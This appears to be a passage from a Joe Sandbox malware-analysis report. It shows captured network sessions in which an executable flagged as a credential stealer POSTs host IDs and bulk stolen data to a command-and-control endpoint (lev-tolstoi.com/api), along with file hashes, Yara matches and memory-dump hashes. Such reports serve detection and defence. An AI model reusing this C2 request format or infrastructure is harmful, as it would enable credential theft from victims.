server-timing: cfL4;desc="?proto=TCP&rtt=2081&min_rtt=1556&rtt_var=1635&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2834&recv_bytes=13798&delivery_rate=506680&cwnd=247&unsent_bytes=0&cid=bca83faa465a522d&ts=972&x=0"
2024-12-23 06:09:28 UTC  20 bytes  IN  Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189
2024-12-23 06:09:28 UTC  5 bytes  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii:
0


Session ID: 4
Source IP: 192.168.2.6
Source Port: 49724
Destination IP: 104.21.66.86
Destination Port: 443
PID: 6480
Process: C:\Users\user\Desktop\tPSrcPbmRe.exe

Timestamp  Bytes transferred  Direction  Data
2024-12-23 06:09:29 UTC  273 bytes  OUT  POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=IC694IXKWB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15057
Host: lev-tolstoi.com
2024-12-23 06:09:29 UTC  15057 bytes  OUT
Data Ascii:
--IC694IXKWB
Content-Disposition: form-data; name="hwid"

5590FA6BE29EBA19AC8923850305D13E
--IC694IXKWB
Content-Disposition: form-data; name="pid"

2
--IC694IXKWB
Content-Disposition: form-data; name="lid"

PsFKDg--pablo
--IC694IXKWB
Content-
2024-12-23 06:09:30 UTC  1131 bytes  IN  HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 06:09:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ugrd0ro3g84bcemq8q06mpuvjm; expires=Thu, 17 Apr 2025 23:56:09 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bNXCK8YR2xDgU3oMSIF0jzaP3u%2BYAapw42SOpv5NwUnI%2F9SoKr2D9rv9xRLnvx5NQIogLRcEL0%2F%2Bs2RJGuMXMmVEI2oNsfIopHMhwaZxPQVKkA%2BOqkoq6nZuN8Li2wdFwPQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f662ee2097e8c1e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1834&min_rtt=1834&rtt_var=688&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15988&delivery_rate=1591280&cwnd=212&unsent_bytes=0&cid=dea02acf7d511408&ts=834&x=0"
2024-12-23 06:09:30 UTC  20 bytes  IN  Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189
2024-12-23 06:09:30 UTC  5 bytes  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii:
0


Session ID: 5
Source IP: 192.168.2.6
Source Port: 49730
Destination IP: 104.21.66.86
Destination Port: 443
PID: 6480
Process: C:\Users\user\Desktop\tPSrcPbmRe.exe

Timestamp  Bytes transferred  Direction  Data
2024-12-23 06:09:32 UTC  274 bytes  OUT  POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=O4QKLE92WLB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 19921
Host: lev-tolstoi.com
2024-12-23 06:09:32 UTC  15331 bytes  OUT
Data Ascii:
--O4QKLE92WLB
Content-Disposition: form-data; name="hwid"

5590FA6BE29EBA19AC8923850305D13E
--O4QKLE92WLB
Content-Disposition: form-data; name="pid"

3
--O4QKLE92WLB
Content-Disposition: form-data; name="lid"

PsFKDg--pablo
--O4QKLE92WLB
Cont
2024-12-23 06:09:32 UTC  4590 bytes  OUT
Data Ascii: ?2+?2+?o?Mp5p_oI
2024-12-23 06:09:33 UTC  1123 bytes  IN  HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 06:09:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=360tmm4nl451jiq94lu1kbj0hs; expires=Thu, 17 Apr 2025 23:56:11 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eEsSWPlKS16wQFFTupj9U86qnobYQqXoV2GvRDNG8T5fFu7Uumtih3MI1ULRro8llORW4%2F9cEton8UuJt4JKwWR670CfwRvIHVH3pk4qMu0L0A1UQTgLa5ZhSbReiD1eMto%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f662ef18e128c84-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1798&rtt_var=700&sent=14&recv=23&lost=0&retrans=0&sent_bytes=2836&recv_bytes=20875&delivery_rate=1536033&cwnd=175&unsent_bytes=0&cid=6a6950bbb4566dbf&ts=947&x=0"
                                                                                                                                                                                                                                                                  2024-12-23 06:09:33 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                  2024-12-23 06:09:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49740 | 104.21.66.86 | 443 | 6480 | C:\Users\user\Desktop\tPSrcPbmRe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:09:34 UTC | 279 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=U852JZ4VHFZ4M1T2B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1226
Host: lev-tolstoi.com
2024-12-23 06:09:34 UTC | 1226 | OUT | Data Raw: 2d 2d 55 38 35 32 4a 5a 34 56 48 46 5a 34 4d 31 54 32 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 35 39 30 46 41 36 42 45 32 39 45 42 41 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 55 38 35 32 4a 5a 34 56 48 46 5a 34 4d 31 54 32 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 38 35 32 4a 5a 34 56 48 46 5a 34 4d 31 54 32 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d
Data Ascii: --U852JZ4VHFZ4M1T2BContent-Disposition: form-data; name="hwid"5590FA6BE29EBA19AC8923850305D13E--U852JZ4VHFZ4M1T2BContent-Disposition: form-data; name="pid"1--U852JZ4VHFZ4M1T2BContent-Disposition: form-data; name="lid"PsFKDg--pablo-
2024-12-23 06:09:35 UTC | 1128 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 06:09:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=6kkao9kp5ci3sbr117np4qtshp; expires=Thu, 17 Apr 2025 23:56:14 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fTpqFJF4VYbI5jySCvP%2FsYkdUBa0bUCs9BcLYqhC5s3ksfk2KmSHYWIYG%2FMBp0XKKoGMVNW6gjMdta%2BMsiLF0%2BXpnEhHaOJdXH29yM4iThrgRuTJxNvopWhs%2BUePHWmud3Y%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f662f0298df438a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1576&rtt_var=601&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2141&delivery_rate=1803582&cwnd=210&unsent_bytes=0&cid=f7d39b5b7c9fd19d&ts=772&x=0"
2024-12-23 06:09:35 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 06:09:35 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49747 | 104.21.66.86 | 443 | 6480 | C:\Users\user\Desktop\tPSrcPbmRe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:09:37 UTC | 275 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=6E5DHM678T6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 572684
Host: lev-tolstoi.com
2024-12-23 06:09:37 UTC | 15331 | OUT | Data Raw: 2d 2d 36 45 35 44 48 4d 36 37 38 54 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 35 39 30 46 41 36 42 45 32 39 45 42 41 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 45 35 44 48 4d 36 37 38 54 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 45 35 44 48 4d 36 37 38 54 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 36 45 35 44 48 4d 36 37 38 54 36 0d 0a 43 6f 6e 74
Data Ascii: --6E5DHM678T6Content-Disposition: form-data; name="hwid"5590FA6BE29EBA19AC8923850305D13E--6E5DHM678T6Content-Disposition: form-data; name="pid"1--6E5DHM678T6Content-Disposition: form-data; name="lid"PsFKDg--pablo--6E5DHM678T6Cont
                                                                                                                                                                                                                                                                  2024-12-23 06:09:40 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 06:09:40 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=kh8tdgmf9nalnckgqnqhgg4pd4; expires=Thu, 17 Apr 2025 23:56:19 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QOkMXiuL9tSDpob4VoQAJ5Yau1tVghFI1jWCMpphIwdmliuSsA%2Bx40rluZM0SGUwEnyWbYOCkNGVdZKDTSrhCJszT4DpWaoszSOzJetNBxMQ5%2F5s4H6xpzywcj4ngJZiNxI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f662f12bb258c75-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1815&rtt_var=688&sent=203&recv=596&lost=0&retrans=0&sent_bytes=2835&recv_bytes=575223&delivery_rate=1580942&cwnd=195&unsent_bytes=0&cid=448e2d1bd56bd577&ts=3259&x=0"



Target ID: 0
Start time: 01:09:14
Start date: 23/12/2024
Path: C:\Users\user\Desktop\tPSrcPbmRe.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\tPSrcPbmRe.exe"
Imagebase: 0xa80000
File size: 1'866'752 bytes
MD5 hash: 259CEA876B4FF788ED27FAB1F9A978CE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2223056639.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2293140651.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2297990501.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000003.2336843987.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_12ed000_tPSrcPbmRe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: %4w
                                                                                                                                                                                                                                                                    • API String ID: 0-3029092977
                                                                                                                                                                                                                                                                    • Opcode ID: c2c248b0d870f4c85397f195bd0df6e134733d96c9cf663df1a9fe3ec37aff5c
                                                                                                                                                                                                                                                                    • Instruction ID: 29db4afe6c7b9cf87fbb2e6bf0476fa4a01b5e04159ca7b4e2de69ee08a11e6c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2c248b0d870f4c85397f195bd0df6e134733d96c9cf663df1a9fe3ec37aff5c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D591AB6184E3C19FC7478B748839591BFB0AE1322471E86DBC8C5CF4A3E26D994AD763
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000003.2375411067.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, Offset: 012B3000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_12b3000_tPSrcPbmRe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: c9e44574e301e9231e0001bd390c0025d2f8e36a49c4326d1ba3d08c39fe731c
                                                                                                                                                                                                                                                                    • Instruction ID: 53e2dfbb508e9d158c921063ec2f9de91997cb32ff64f6499fe31a581ec425d8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9e44574e301e9231e0001bd390c0025d2f8e36a49c4326d1ba3d08c39fe731c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9A111A145E3C29FCB138B7888A55817FB0AE1325871E41DBC1D4CF4B3E22A595ED763
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000003.2336843987.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_12ed000_tPSrcPbmRe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 41b579e1ed4c3235658c1771ef132004d5d566f962a3b7f4f153764e5406d4a4
                                                                                                                                                                                                                                                                    • Instruction ID: 9e594c85b0dea37727d9cc808d852dfd79279ae30fa9b984c00a951bc298fdb7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41b579e1ed4c3235658c1771ef132004d5d566f962a3b7f4f153764e5406d4a4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9B1796544E7C19FC3479B7888655923FB0AE1321872F45EBC4C1CF5B3E26E494ACB62
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000003.2336843987.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_12ed000_tPSrcPbmRe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 99fbd161f5d8a4eb136bdf8d8d756aed01a6aa48bca689d5280fd80f2cc47081
                                                                                                                                                                                                                                                                    • Instruction ID: ef41cf8d1e7f7756c4dc9c39019773fa8e69898c37fd5a34140bd361c605d368
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99fbd161f5d8a4eb136bdf8d8d756aed01a6aa48bca689d5280fd80f2cc47081
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0681453001D3DA9FC717CF78CAA9696BFE6BF03214B5D46C9D8C18E2A3C2616644C75A
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000003.2375411067.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, Offset: 012B3000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_12b3000_tPSrcPbmRe.jbxd